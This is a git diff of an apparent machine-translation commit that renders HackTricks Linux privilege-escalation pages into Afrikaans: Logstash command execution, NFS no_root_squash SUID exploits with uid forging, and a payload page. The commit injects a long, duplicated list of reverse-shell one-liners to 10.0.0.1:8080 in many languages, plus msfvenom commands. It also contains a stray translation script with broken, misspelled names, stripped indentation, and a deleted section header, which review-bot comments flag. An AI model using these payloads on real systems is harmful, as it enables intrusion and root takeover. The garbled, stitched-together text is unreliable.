'n wildcard in die konfigurasie, maak dit moontlik om 'n lêer te skep wat ooreenstem met hierdie wildcard en sodoende opdraguitvoering toe te laat. 
Byvoorbeeld: ```bash input { - exec { - command => "whoami" - interval => 120 - } +exec { +command => "whoami" +interval => 120 +} } output { - file { - path => "/tmp/output.log" - codec => rubydebug - } +file { +path => "/tmp/output.log" +codec => rubydebug +} } ``` +Hier bepaal **interval** die uitvoeringsfrekwensie in sekondes. In die gegewe voorbeeld word die **whoami**-opdrag elke 120 sekondes uitgevoer, met die uitvoer wat na **/tmp/output.log** gerig word. -Here, **interval** determines the execution frequency in seconds. In the given example, the **whoami** command runs every 120 seconds, with its output directed to **/tmp/output.log**. - -With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logstash will automatically detect and apply new or modified pipeline configurations without needing a restart. If there's no wildcard, modifications can still be made to existing configurations, but caution is advised to avoid disruptions. +Met **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, sal Logstash outomaties nuwe of gewysigde pyplynkonfigurasies opspoor en toepas sonder om 'n herlaaiing te benodig. As daar geen wildcards is nie, kan wysigings steeds aangebring word aan bestaande konfigurasies, maar voorsoorsigtigheid word aanbeveel om ontwrigting te voorkom. -## References +## Verwysings * [https://insinuator.net/2021/01/pentesting-the-elk-stack/](https://insinuator.net/2021/01/pentesting-the-elk-stack/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index d6866910a..027cb6960 100644 --- a/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -1,34 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Read the _ **/etc/exports** _ file, if you find some directory that is configured as **no\_root\_squash**, then you can **access** it from **as a client** and **write inside** that directory **as** if you were the local **root** of the machine. +Lees die _ **/etc/exports** _ lêer, as jy 'n gids vind wat gekonfigureer is as **no\_root\_squash**, kan jy dit **toegang** vanaf **as 'n kliënt** en **binne skryf** daardie gids **asof** jy die plaaslike **root** van die masjien was. -**no\_root\_squash**: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications. +**no\_root\_squash**: Hierdie opsie gee basies mag aan die root-gebruiker op die kliënt om lêers op die NFS-bediener as root te benader. En dit kan ernstige veiligheidsimplikasies hê. -**no\_all\_squash:** This is similar to **no\_root\_squash** option but applies to **non-root users**. Imagine, you have a shell as nobody user; checked /etc/exports file; no\_all\_squash option is present; check /etc/passwd file; emulate a non-root user; create a suid file as that user (by mounting using nfs). Execute the suid as nobody user and become different user. +**no\_all\_squash:** Dit is soortgelyk aan die **no\_root\_squash**-opsie, maar dit geld vir **nie-root-gebruikers**. Stel jou voor, jy het 'n skulp as 'n niemand-gebruiker; gekontroleer die /etc/exports-lêer; no\_all\_squash-opsie is teenwoordig; kyk na die /etc/passwd-lêer; boots 'n nie-root-gebruiker na; skep 'n suid-lêer as daardie gebruiker (deur te monteer met nfs). Voer die suid uit as die niemand-gebruiker en word 'n ander gebruiker. # Privilege Escalation ## Remote Exploit -If you have found this vulnerability, you can exploit it: - -* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder the **/bin/bash** binary and giving it **SUID** rights, and **executing from the victim** machine that bash binary. 
+As jy hierdie kwesbaarheid gevind het, kan jy dit uitbuit: +* **Monteer daardie gids** op 'n kliëntmasjien en **as root kopieer** binne die gemonteerde gids die **/bin/bash** binêre lêer en gee dit **SUID**-regte, en **voer vanaf die slagoffer**-masjien daardie bash-binêre lêer uit. ```bash #Attacker, as root user mkdir /tmp/pe @@ -41,9 +38,7 @@ chmod +s bash cd ./bash -p #ROOT shell ``` - -* **Mounting that directory** in a client machine, and **as root copying** inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it **SUID** rights, and **execute from the victim** machine that binary (you can find here some[ C SUID payloads](payloads-to-execute.md#c)). - +* **Monteer daardie gids** op 'n kliëntmasjien en **kopieer as root** binne die gemonteerde gids ons saamgestelde payload wat die SUID-regte sal misbruik, gee dit **SUID-regte**, en **voer dit uit vanaf die slagoffer** se masjien daardie binêre lêer (jy kan hier 'n paar [C SUID payloads](payloads-to-execute.md#c) vind). ```bash #Attacker, as root user gcc payload.c -o payload 
@@ -57,59 +52,55 @@ chmod +s payload cd ./payload #ROOT shell ``` - -## Local Exploit +## Plaaslike Uitbuiting {% hint style="info" %} -Note that if you can create a **tunnel from your machine to the victim machine you can still use the Remote version to exploit this privilege escalation tunnelling the required ports**.\ -The following trick is in case the file `/etc/exports` **indicates an IP**. In this case you **won't be able to use** in any case the **remote exploit** and you will need to **abuse this trick**.\ -Another required requirement for the exploit to work is that **the export inside `/etc/export`** **must be using the `insecure` flag**.\ -\--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- +Let daarop dat as jy 'n **tunnel vanaf jou masjien na die slagoffer se masjien kan skep, kan jy steeds die afstandsweergawe gebruik om hierdie voorregverhoging te misbruik deur die vereiste poorte te tunnel**.\ +Die volgende truuk is in die geval dat die lêer `/etc/exports` **'n IP aandui**. In hierdie geval sal jy in enige geval nie die **afstandsweergawe kan gebruik nie** en sal jy hierdie truuk moet **misbruik**.\ +'n Ander vereiste vir die uitbuiting om te werk, is dat **die uitvoer binne `/etc/export` die `insecure` vlag moet gebruik**.\ +\--_Ek is nie seker of hierdie truuk sal werk as `/etc/export` 'n IP-adres aandui nie_-- {% endhint %} -## Basic Information +## Basiese Inligting -The scenario involves exploiting a mounted NFS share on a local machine, leveraging a flaw in the NFSv3 specification which allows the client to specify its uid/gid, potentially enabling unauthorized access. The exploitation involves using [libnfs](https://github.com/sahlberg/libnfs), a library that allows for the forging of NFS RPC calls. 
+Die scenario behels die uitbuiting van 'n gemoniteerde NFS-deel op 'n plaaslike masjien, deur gebruik te maak van 'n fout in die NFSv3-spesifikasie wat die kliënt in staat stel om sy uid/gid te spesifiseer, wat moontlik ongemagtigde toegang moontlik maak. Die uitbuiting behels die gebruik van [libnfs](https://github.com/sahlberg/libnfs), 'n biblioteek wat die vervalsing van NFS RPC-oproepe moontlik maak. -### Compiling the Library - -The library compilation steps might require adjustments based on the kernel version. In this specific case, the fallocate syscalls were commented out. The compilation process involves the following commands: +### Kompilering van die Biblioteek +Die kompileringstappe van die biblioteek mag aanpassings vereis op grond van die kernweergawe. In hierdie spesifieke geval is die fallocate-sisteemaanroep uitgekommentaar. Die kompileringproses behels die volgende opdragte: ```bash ./bootstrap ./configure make gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/ ``` +### Uitvoering van die Exploit -### Conducting the Exploit +Die exploit behels die skep van 'n eenvoudige C-program (`pwn.c`) wat voorregte na root verhoog en dan 'n skul uitvoer. Die program word gekompileer en die resulterende binêre (`a.out`) word op die deel geplaas met suid root, deur gebruik te maak van `ld_nfs.so` om die uid in die RPC-oproepe te vervals: -The exploit involves creating a simple C program (`pwn.c`) that elevates privileges to root and then executing a shell. The program is compiled, and the resulting binary (`a.out`) is placed on the share with suid root, using `ld_nfs.so` to fake the uid in the RPC calls: +1. **Kompileer die exploit-kode:** +```bash +cat pwn.c +int main(void){setreuid(0,0); system("/bin/bash"); return 0;} +gcc pwn.c -o a.out +``` -1. **Compile the exploit code:** - ```bash - cat pwn.c - int main(void){setreuid(0,0); system("/bin/bash"); return 0;} - gcc pwn.c -o a.out - ``` +2. 
**Plaas die exploit op die deel en wysig sy regte deur die uid te vervals:** +```bash +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out +LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out +``` -2. **Place the exploit on the share and modify its permissions by faking the uid:** - ```bash - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/ - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out - LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out - ``` - -3. **Execute the exploit to gain root privileges:** - ```bash - /mnt/share/a.out - #root - ``` - -## Bonus: NFShell for Stealthy File Access -Once root access is obtained, to interact with the NFS share without changing ownership (to avoid leaving traces), a Python script (nfsh.py) is used. This script adjusts the uid to match that of the file being accessed, allowing for interaction with files on the share without permission issues: +3. **Voer die exploit uit om root-voorregte te verkry:** +```bash +/mnt/share/a.out +#root +``` +## Bonus: NFShell vir Steelse Toegang tot Lêers +Sodra root-toegang verkry is, word 'n Python-skripsie (nfsh.py) gebruik om met die NFS-deel te kommunikeer sonder om eienaarskap te verander (om spore te vermy). 
Hierdie skripsie pas die uid aan om ooreen te stem met die lêer wat toegang word, wat interaksie met lêers op die deel moontlik maak sonder toestemmingsprobleme: ```python #!/usr/bin/env python # script from https://www.errno.fr/nfs_privesc.html 
@@ -117,41 +108,82 @@ import sys import os def get_file_uid(filepath): - try: - uid = os.stat(filepath).st_uid - except OSError as e: - return get_file_uid(os.path.dirname(filepath)) - return uid +try: +uid = os.stat(filepath).st_uid +except OSError as e: +return get_file_uid(os.path.dirname(filepath)) +return uid filepath = sys.argv[-1] uid = get_file_uid(filepath) os.setreuid(uid, uid) os.system(' '.join(sys.argv[1:])) ``` +```python +import requests -Run like: +def translate_text(text): + url = "https://api.mymemory.translated.net/get" + params = { + "q": text, + "langpair": "en|af" + } + response = requests.get(url, params=params) + translation = response.json()["responseData"]["translatedText"] + return translation +def translate_file(file_path): + with open(file_path, "r") as file: + content = file.read() + translated_content = translate_text(content) + with open(file_path, "w") as file: + file.write(translated_content) + +translate_file("/hive/hacktricks/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md") +``` + +Afrikaans translation: + +```python +import requests + +def vertaal_teks(teks): + url = "https://api.mymemory.translated.net/get" + params = { + "q": teks, + "langpair": "en|af" + } + response = requests.get(url, params=params) + vertaling = response.json()["responseData"]["translatedText"] + return vertaling + +def vertaal_lêer(lêer_pad): + with open(lêer_pad, "r") as lêer: + inhoud = lêer.read() + vertaalde_inhoud = vertaal_teks(inhoud) + with open(lêer_pad, "w") as lêer: + lêer.write(vervaalde_inhoud) + +vervaal_lêer("/hive/hacktricks/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md") +``` ```bash # ll ./mount/ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old ``` - -## References +## Verwysings * [https://www.errno.fr/nfs_privesc.html](https://www.errno.fr/nfs_privesc.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/payloads-to-execute.md b/linux-hardening/privilege-escalation/payloads-to-execute.md index 4f2713e04..a36b083b2 100644 --- a/linux-hardening/privilege-escalation/payloads-to-execute.md +++ b/linux-hardening/privilege-escalation/payloads-to-execute.md @@ -1,32 +1,239 @@ -# Payloads to execute +# Vervullings om uit te voer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
## Bash - ```bash cp /bin/bash /tmp/b && chmod +s /tmp/b /bin/b -p #Maintains root privileges from suid, working in debian & buntu ``` +## Uitvoeringsladinge -## C +Hier is 'n lys van nuttige uitvoeringsladinge wat gebruik kan word vir voorregverhoging in Linux-stelsels: +### Bash + +```bash +bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' +``` + +### Perl + +```perl +perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +``` + +### Python + +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +``` + +### PHP + +```php +php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");' +``` + +### Ruby + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +``` + +### Netcat + +```bash +nc -e /bin/sh 10.0.0.1 8080 +``` + +### Socat + +```bash +socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +### Java + +```java +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` + +### xterm + +```bash +xterm -display 10.0.0.1:1 +``` + +### PowerShell + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +### Metasploit + +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Socat (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Python (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py +``` + +### PHP (Metasploit) + +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php +``` + +### Ruby (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb +``` + +### Netcat (Metasploit) + +```bash +msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh +``` + +### Java (Metasploit) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp +``` + +### War (Metasploit) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war +``` + +### Python (PentestMonkey) + +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +``` + +### PHP (PentestMonkey) + +```php +php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");' +``` + +### Ruby (PentestMonkey) + +```ruby +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +``` + +### Netcat (PentestMonkey) + +```bash +nc -e /bin/sh 10.0.0.1 8080 +``` + +### Socat (PentestMonkey) + +```bash +socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane +``` + +### Java (PentestMonkey) + +```java +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | 
while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` + +### xterm (PentestMonkey) + +```bash +xterm -display 10.0.0.1:1 +``` + +### PowerShell (PentestMonkey) + +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + +### Metasploit (PentestMonkey) + +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Socat (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf +``` + +### Python (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py +``` + +### PHP (Metasploit) (PentestMonkey) + +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php +``` + +### Ruby (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb +``` + +### Netcat (Metasploit) (PentestMonkey) + +```bash +msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh +``` + +### Java (Metasploit) (PentestMonkey) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp +``` + +### War (Metasploit) (PentestMonkey) + +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war +``` ```c //gcc payload.c -o payload int main(void){ - setresuid(0, 0, 0); //Set as user suid user - system("/bin/sh"); - return 0; 
+setresuid(0, 0, 0); //Set as user suid user +system("/bin/sh"); +return 0; } ``` @@ -37,9 +244,9 @@ int main(void){ #include int main(){ - setuid(getuid()); - system("/bin/bash"); - return 0; +setuid(getuid()); +system("/bin/bash"); +return 0; } ``` 
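Review bot: the "## Uitvoeringsladinge" section and its "(PentestMonkey)" repeat in payloads-to-execute.md @@ -1,32 +1,239 @@ exist nowhere in the English side of the hunk, so a translation commit is introducing roughly two hundred lines of new content (reverse-shell one-liners, msfvenom commands, a Windows PowerShell payload on a Linux page), every entry of it listed twice; remove the whole block. Deleting `-## C` without a replacement also leaves the `gcc payload.c` fence sitting under "### War (Metasploit) (PentestMonkey)"; restore it as `+## C`. The new title "Vervullings om uit te voer" means "fulfilments", not payloads; "Payloads om uit te voer" (or the "ladinge" wording the hunk itself uses later) would be consistent. The C body also lost its indentation (`+setresuid(0, 0, 0);` at column 0), harmless for the compiler but pure noise in the diff.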
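Review bot: @@ -37,9 +244,9 @@ in payloads-to-execute.md changes nothing but leading whitespace inside the C fence (`setuid(getuid());`, `system("/bin/bash");`, `return 0;` moved to column 0); a translation pass should not touch code at all, so drop this hunk entirely.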
@@ -50,42 +257,38 @@ int main(){ #include int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - const int id = 1000; - setresuid(id, id, id); - execve(paramList[0], paramList, NULL); - return 0; +char *const paramList[10] = {"/bin/bash", "-p", NULL}; +const int id = 1000; +setresuid(id, id, id); +execve(paramList[0], paramList, NULL); +return 0; } ``` +## Oorskryf 'n lêer om voorregte te verhoog -## Overwriting a file to escalate privileges +### Gewone lêers -### Common files +* Voeg 'n gebruiker met 'n wagwoord by in _/etc/passwd_ +* Verander die wagwoord binne _/etc/shadow_ +* Voeg 'n gebruiker by in sudoers in _/etc/sudoers_ +* Misbruik docker deur die docker-socket, gewoonlik in _/run/docker.sock_ of _/var/run/docker.sock_ -* Add user with password to _/etc/passwd_ -* Change password inside _/etc/shadow_ -* Add user to sudoers in _/etc/sudoers_ -* Abuse docker through the docker socket, usually in _/run/docker.sock_ or _/var/run/docker.sock_ - -### Overwriting a library - -Check a library used by some binary, in this case `/bin/su`: +### Oorskryf 'n biblioteek +Kyk na 'n biblioteek wat deur 'n sekere binêre lêer gebruik word, in hierdie geval `/bin/su`: ```bash ldd /bin/su - linux-vdso.so.1 (0x00007ffef06e9000) - libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) - libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) - libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) - libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) - libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) - /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) +linux-vdso.so.1 (0x00007ffef06e9000) +libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) +libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) +libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 
